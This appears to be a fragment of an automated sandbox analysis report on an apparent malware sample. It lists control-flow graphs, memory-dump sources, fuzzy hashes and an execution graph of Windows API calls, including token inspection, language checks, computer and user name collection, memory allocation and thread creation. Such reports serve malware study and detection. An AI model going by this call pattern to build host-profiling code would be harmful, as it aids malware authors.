                                                                                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                                                                                      • Opcode ID: 5080e461cbe7137318f1ecf272b4f48bf741cad0b871aa1b732aff33c44ab629
                                                                                                                                                                                                                                      • Instruction ID: fd41a419462c2cf5f5f178ccc739c82b6f9767ba95909da1706b0e2e6a51f796
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5080e461cbe7137318f1ecf272b4f48bf741cad0b871aa1b732aff33c44ab629
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3851B0B1D10309DFDF14DF99C984ADEBBB5BF48314F24812AE819AB210D7759885CF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1190 5584b90-5584bf6 1191 5584bf8-5584bfe 1190->1191 1192 5584c01-5584c08 1190->1192 1191->1192 1193 5584c0a-5584c10 1192->1193 1194 5584c13-5584cb2 CreateWindowExW 1192->1194 1193->1194 1196 5584cbb-5584cf3 1194->1196 1197 5584cb4-5584cba 1194->1197 1201 5584d00 1196->1201 1202 5584cf5-5584cf8 1196->1202 1197->1196 1203 5584d01 1201->1203 1202->1201 1203->1203
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05584CA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                                                                                      • Opcode ID: 32abf38ce21314e5ff3708ee07ec651271f955f8e77437083cf368a70e9827e3
                                                                                                                                                                                                                                      • Instruction ID: 9d002454ab3db2d6ec74a603e319dc5d1dc279c8f97fa1103303d10669b1f81c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32abf38ce21314e5ff3708ee07ec651271f955f8e77437083cf368a70e9827e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41AFB1D10349DFDF14DFA9C984ADEBBB5BF48314F24812AE819AB210D771A885CF91

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1204 5583a7c-558719c 1207 558724c-558726c call 5583954 1204->1207 1208 55871a2-55871a7 1204->1208 1215 558726f-558727c 1207->1215 1210 55871a9-55871e0 1208->1210 1211 55871fa-5587232 CallWindowProcW 1208->1211 1217 55871e9-55871f8 1210->1217 1218 55871e2-55871e8 1210->1218 1213 558723b-558724a 1211->1213 1214 5587234-558723a 1211->1214 1213->1215 1214->1213 1217->1215 1218->1217
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05587221
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                                      • Opcode ID: 2636788c4cfb90ad78522b22f1496aaa3904df29a83b5dd61e1f459027931e3c
                                                                                                                                                                                                                                      • Instruction ID: fbf8f1cde5472a9ffff53bcb33e3a646701e4363845b0727aad2be6c446fde65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2636788c4cfb90ad78522b22f1496aaa3904df29a83b5dd61e1f459027931e3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D74109B5A102098FCB14DF99C488AAAFBF5FF88314F24C859E519A7321D735A845CFA4

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1221 1326ecc-1328839 CreateActCtxA 1224 1328842-132889c 1221->1224 1225 132883b-1328841 1221->1225 1232 13288ab-13288af 1224->1232 1233 132889e-13288a1 1224->1233 1225->1224 1234 13288c0 1232->1234 1235 13288b1-13288bd 1232->1235 1233->1232 1235->1234
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 01328829
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1953547630.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_1320000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      • Opcode ID: 2ec30851f658844b530bb3443476f46257b696af929bdc2ec531c9a5f1349e02
                                                                                                                                                                                                                                      • Instruction ID: 11581e2a664fc35eba8ba61089fd2848c4ae0508a98a5de8c83e26e078d1d233
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec30851f658844b530bb3443476f46257b696af929bdc2ec531c9a5f1349e02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D2B0C0061DCBDB24DFA9C8447DEBBF5BF48308F2484AAD508AB255DBB55945CF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1237 558b8a0-558b8f4 1238 558b8ff-558b90e 1237->1238 1239 558b8f6-558b8fc 1237->1239 1240 558b910 1238->1240 1241 558b913-558b94c DrawTextExW 1238->1241 1239->1238 1240->1241 1242 558b94e-558b954 1241->1242 1243 558b955-558b972 1241->1243 1242->1243
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0558B93F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                                                                                      • Opcode ID: 16299ae8a070de8e271499b3c52fd395b04c90da95bd25bfb6697639120a8c84
                                                                                                                                                                                                                                      • Instruction ID: 596158d0b21cc65daa6e0d2193ae3566dfdcda824c6092d76fe2521fce6528dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16299ae8a070de8e271499b3c52fd395b04c90da95bd25bfb6697639120a8c84
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB21C0B5D012099FDB10DF99D984AEEFBF9FB48320F14842AE919A7310D775A944CFA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1246 558b8a8-558b8f4 1247 558b8ff-558b90e 1246->1247 1248 558b8f6-558b8fc 1246->1248 1249 558b910 1247->1249 1250 558b913-558b94c DrawTextExW 1247->1250 1248->1247 1249->1250 1251 558b94e-558b954 1250->1251 1252 558b955-558b972 1250->1252 1251->1252
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0558B93F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                                                                                      • Opcode ID: 8c7d42dbd268987cd4e79b7410fb8eb7ade6a69b8a26f95c26239caa16c532fe
                                                                                                                                                                                                                                      • Instruction ID: 7f0c628b9756c23bf13f89e54bda15c96d37ed335e95c5581473c9eb0a908d40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c7d42dbd268987cd4e79b7410fb8eb7ade6a69b8a26f95c26239caa16c532fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21C3B5D002099FDB10DF9AD884AAEFBF9FB48320F14842AE919A7310D774A544CFA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1255 9433632-94336a2 PostMessageW 1257 94336a4-94336aa 1255->1257 1258 94336ab-94336bf 1255->1258 1257->1258
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 09433695
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2062330548.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_9430000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: 4a2f6434230dced4c1bf0786a72e6f64726e84bf5109acbee8b034c345a5aeae
                                                                                                                                                                                                                                      • Instruction ID: 70456f5a11e0597caab7128822d515e4807b672be2f4e0d6fe53a843d26b6490
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a2f6434230dced4c1bf0786a72e6f64726e84bf5109acbee8b034c345a5aeae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8111F5B58002489FDB10DF99D848BDEBFF4EB48324F10841AE859A7310C375A544CFA1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1260 132e260-132e2a0 1261 132e2a2-132e2a5 1260->1261 1262 132e2a8-132e2d3 GetModuleHandleW 1260->1262 1261->1262 1263 132e2d5-132e2db 1262->1263 1264 132e2dc-132e2f0 1262->1264 1263->1264
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0132E2C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1953547630.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_1320000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: e0d29a309dce4aa84c65a9907ff56aae1951cdb847689486b0ebe947551dbd1f
                                                                                                                                                                                                                                      • Instruction ID: 3cbbfc9b1b3195d26f337b108e9718eed45f25b39f2ff8ef426165e275993482
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0d29a309dce4aa84c65a9907ff56aae1951cdb847689486b0ebe947551dbd1f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF1140B5C003198FDB14EF9AC848ADEFBF4AB89324F10842AC819B7300C375A544CFA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1266 9433669-94336a2 PostMessageW 1267 94336a4-94336aa 1266->1267 1268 94336ab-94336bf 1266->1268 1267->1268
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 09433695
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.2062330548.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_9430000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: e033714b8e4b3b3ffb1e3b523520e471becab49cb452e76bfa424aaa11d54bed
                                                                                                                                                                                                                                      • Instruction ID: bb8fc46c7213352dcce38b6f1370d2c0ebb9ccc7f25ee6de33adbdedb260b1f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e033714b8e4b3b3ffb1e3b523520e471becab49cb452e76bfa424aaa11d54bed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F0C4B58002099FDB10CF99D448BDEBBF4AB58324F10C41AE558A7210C375A594CFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
                                                                                                                                                                                                                                      • Instruction ID: 62a3ac8d5d63f5f207c2427facc11354e611b78ed677a4be9956a7d09404b288
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0213371550208DFCB11DF58E9C0B26BF65FB98B18F20C27DEA090B256C336D446CAE1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
                                                                                                                                                                                                                                      • Instruction ID: fef700a294f8ef028209d5fb063101c7e67986fda7e94239ccf602d5ecca81c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21FEB5110208DFDB11DF48C9C0B66BB65EB88724F20C27DEB094A256C336E446CAA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1aaeeb150456e8804172782a2d223454c32e0062c047ea41170bf8f3f1d98488
                                                                                                                                                                                                                                      • Instruction ID: 6f8cc4c8ed390192efa2053b0a24ad6fdd01fec6ea2eba34e7b01a44a8d268d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aaeeb150456e8804172782a2d223454c32e0062c047ea41170bf8f3f1d98488
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51214270214608DFCB11DF68D980B26BFA5EBC8315F20C56DD90A4B296C37AD407CA61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: af6ddf145e21f4ff67f9a05b9a570f11e418fdf2a28063cb6309b123ecd3dcb8
                                                                                                                                                                                                                                      • Instruction ID: 97f78620ef2e72f0dde2721ba1d06da878ba296a6dd49d1ab600e30c643a6887
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af6ddf145e21f4ff67f9a05b9a570f11e418fdf2a28063cb6309b123ecd3dcb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12214671554608EFDB01DFA8C9C8B26BFA5FB84324F20C66DE9094B297C376D846CA61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5fb7bddd7a7c9fd8b2d0cbd20e71790f0e897eb0841281abafccf4fc2cb0fd26
                                                                                                                                                                                                                                      • Instruction ID: bc1386dd01154f1cd2fd93549fd297f22719234138cbba988556de5f8b686793
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fb7bddd7a7c9fd8b2d0cbd20e71790f0e897eb0841281abafccf4fc2cb0fd26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D621D1755083848FCB03CF24C990711BF71EB85314F28C5EAD9498B2A7C33AD40ACB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction ID: d576e73b1cb844f5849ae709227b1d4fa0f81980b4a3743ff840a7b07b7afb96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C11E176404284CFCB12CF54E9C4B16BF71FB94718F24C6ADDA090B256C336D45ACBA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction ID: 987b9dc3b30d26108252c0e35849812bc2f2595bd8c0bf6e2aadd9375e111eeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B11CA76404284DFDB12CF44D9C4B56BF72FB94224F24C2ADDA090A256C33AE45ACBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                      • Instruction ID: 14b0c2a2760bc6d5fc6f812389c7c09b46a069fa000b8c7f05e1cab3bc19d548
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5911BB75544684DFDB02CF54C5C8B15BFB1FB84224F24C6AAD9494B697C33AD40ACB61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a4fbff774d6c2be1c7a4b2b13308911a262bfebf378e47288944d793ad9c5b6c
                                                                                                                                                                                                                                      • Instruction ID: 54461ec4a2760d7ca1af350d16c323c18d0ab19b969ae85235ab6c46d5035011
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4fbff774d6c2be1c7a4b2b13308911a262bfebf378e47288944d793ad9c5b6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23012B311183889AE7155EA9CDC4B67FF98DF41B24F18C63EEF090A286C279D844C6F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5637c831c9e1fef9c621f9cc74bc3908356f38b759c8f61b82b0a13b5b142aeb
                                                                                                                                                                                                                                      • Instruction ID: 9daf28f692e658b8ffb812783e15a607648414648e4ffeb10c32ece72b040311
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5637c831c9e1fef9c621f9cc74bc3908356f38b759c8f61b82b0a13b5b142aeb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F068715043449EE7159E5ACCC8B62FFA8EB41734F18C55EEE484A286C2759844CAB1

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.9%
                                                                                                                                                                                                                                      Signature Coverage:4.3%
                                                                                                                                                                                                                                      Total number of Nodes:94
                                                                                                                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                                                                                                                      execution_graph 5602 b181b1 5603 b18075 5602->5603 5604 b18186 CloseHandle 5603->5604 5605 b181ad GetTokenInformation 5603->5605 5606 b180ca GetTokenInformation 5603->5606 5607 b180a7 5603->5607 5604->5603 5605->5603 5606->5603 5667 b18090 5669 b18075 5667->5669 5668 b18186 CloseHandle 5668->5669 5669->5668 5670 b180ca GetTokenInformation 5669->5670 5671 b180a7 5669->5671 5672 b181ad GetTokenInformation 5669->5672 5670->5669 5672->5669 5688 b157f0 5691 b155ac 5688->5691 5689 b155e4 5691->5688 5691->5689 5692 b33870 5691->5692 5694 b33876 5692->5694 5695 b33893 5694->5695 5696 b33720 5694->5696 5695->5691 5697 b20c42 5696->5697 5697->5696 5698 b1e050 VirtualAlloc 5697->5698 5699 b337dd 5697->5699 5698->5697 5699->5695 5699->5699 5673 b152f4 5676 b152cb 5673->5676 5674 b152b0 5675 b153c4 GetSystemDefaultLangID 5675->5674 5676->5674 5676->5675 5662 b152b7 5663 b152b0 5662->5663 5664 b152c4 5662->5664 5664->5663 5665 b153c4 GetSystemDefaultLangID 5664->5665 5666 b15475 5665->5666 5608 b15b00 5609 b15bba 5608->5609 5616 b252c0 5609->5616 5611 b15bc7 5615 b15bde 5611->5615 5621 b30080 5611->5621 5617 b252c6 5616->5617 5620 b252ce 5616->5620 5617->5620 5635 b1e050 5617->5635 5620->5611 5627 b30089 5621->5627 5622 b303e0 GetComputerNameW 5622->5627 5623 b30181 VirtualFree 5623->5627 5624 b1e050 VirtualAlloc 5624->5627 5625 b303bf GetUserNameW 5625->5627 5626 b304d6 GetComputerNameW 5626->5627 5627->5622 5627->5623 5627->5624 5627->5625 5627->5626 5628 b15c7b 5627->5628 5629 b18070 5628->5629 5633 b18075 5629->5633 5630 b18186 CloseHandle 5630->5633 5631 b181ad GetTokenInformation 5631->5633 5632 b180ca GetTokenInformation 5632->5633 5633->5630 5633->5631 5633->5632 5634 b180a7 5633->5634 5634->5615 5636 b1e0c3 5635->5636 5637 b1e0d8 VirtualAlloc 5636->5637 5637->5636 5677 b15860 5678 b252c0 VirtualAlloc 5677->5678 5679 b15869 5678->5679 5680 b30080 5 API calls 5679->5680 5681 b1587d 5680->5681 5682 b18070 3 API calls 5681->5682 5683 b15870 5682->5683 5638 b15b42 5640 b15b07 5638->5640 5640->5638 5642 b15bb4 5640->5642 5643 b15b68 5640->5643 5644 b152a0 5640->5644 5641 b15cdf CreateThread 5641->5642 5641->5643 5648 b154a0 5641->5648 5642->5641 5642->5643 5647 b152ab 5644->5647 5645 b153c4 GetSystemDefaultLangID 5646 b152b0 5645->5646 5646->5640 5647->5645 5647->5646 5649 b154b5 5648->5649 5655 b15b87 CreateThread 5657 b15b1c 5655->5657 5660 b15810 5655->5660 5656 b15cdf CreateThread 5656->5657 5658 b15c01 5656->5658 5659 b154a0 5656->5659 5657->5656 5657->5658 5661 b15822 5660->5661 5735 b15347 5736 b152cb 5735->5736 5737 b153c4 GetSystemDefaultLangID 5736->5737 5739 b152b0 5736->5739 5738 b15475 5737->5738 5710 b15b09 5711 b15b16 5710->5711 5712 b15cdf CreateThread 5711->5712 5713 b15c01 5711->5713 5712->5711 5712->5713 5714 b154a0 5712->5714 5700 b155ef 5703 b155ac 5700->5703 5701 b33870 VirtualAlloc 5701->5703 5702 b155e4 5703->5701 5703->5702

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
